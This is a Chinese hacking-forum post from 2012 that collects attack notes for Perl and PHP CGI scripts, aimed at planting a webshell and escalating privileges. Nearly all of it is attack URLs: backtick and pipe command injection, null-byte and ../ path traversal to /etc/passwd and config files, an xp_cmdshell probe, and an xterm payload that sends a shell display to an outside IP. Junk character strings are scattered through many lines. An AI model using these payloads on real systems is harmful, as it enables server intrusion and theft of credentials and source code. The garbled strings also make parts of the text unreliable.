找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2992|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  ( E0 z8 C" f( ^( E  @( a
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
9 m% a7 r% j& d7 L感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  4 o5 J8 z7 D2 P& @
注“  
5 h, [5 a9 W* |  J! Fperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
/ G$ j2 t  r3 H7 p以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
/ R! R; E: b$ w1 Y! _
6 X, E. i$ h8 Y( j* S# _http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  4 u" h- C3 j4 G2 K5 {2 K9 V8 q
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  5 H) d- N" F* G- a& A& N
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  3 |' h: ?+ _" ?# G% w" ^3 z5 [
http://target.com/cgi-bin/home/news/sub.pl?`id`  ( y+ G* v" W* k& T, }$ p
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
. C; X, a' O' @5 J  \http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示    w# ^* k. {. @. X  k$ U# r! y* H
4 ]& {; C* O7 d9 ^/ P0 l% A
http://target.com/test.pl;ls|  
8 u: k/ j3 r) i, x7 p) [http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
7 F) f0 D. m4 {: W# p' o+ q5 ]3 qhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  3 L' e7 V  d4 I9 _/ W  m, t
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  2 O; v1 ?: Z; ~4 F% D  w3 I
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
  k! F9 o5 b; Lhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
8 s. z8 {( o2 A% s& x1 K6 l2 C$ x0 x2 |/ m4 c
http://target.com/test.pl?&........ /../../etc/passwd  , e3 M$ t0 {1 q3 e1 Y

  z9 ~' K' A  C8 Ehttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
7 H+ N9 ~) G0 g# ~- G0 U! u% M7 zhttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
1 O( _- W, g2 M' \/ \http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
. @/ z. x, K" F- i3 v, s% Q. Q1 t5 U( H, ^5 M
http://www.target.org/show.php?f ... /include/config.php 查看php代码  ( w8 S. _) L9 j4 V% M6 b" L, V* A
http://www.target.org/show.php?f ... ng/admin/global.php  2 w0 N. p& Z( x: J

3 \" z) V; E6 }, M9 J7 [0 \' }emm和ps的一句话" v/ N; I9 }5 o1 }6 t
) G% ]7 K# _" L
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  2 C! }( w$ f1 g+ @% ~5 q; d- \' x

( T. b3 z' o/ \4 Y/ C>bbb%20|  
9 p' r, }. v* f0 T9 d3 t
6 O; M4 \% s5 t- q" {5 j) M9 fhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  ' n0 |+ @" \& a
7 W+ n6 ^# N1 y
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  ' j& s4 N3 E0 k
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
6 }1 u5 p+ X; f" m$ V$ T0 z  v3 c% o9 f; O
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
7 i8 V2 Z# U, [  b* \! Mhttp://target.com/index.html#cmd.exe  8 x* y. `. a' b' c. m9 x
http://target.com/index.html?dummyparam=xp_cmdshell  , P) X# ~- [3 k# E( Z7 V8 \& V
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
3 W) n3 b5 F. R4 ^4 e. ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表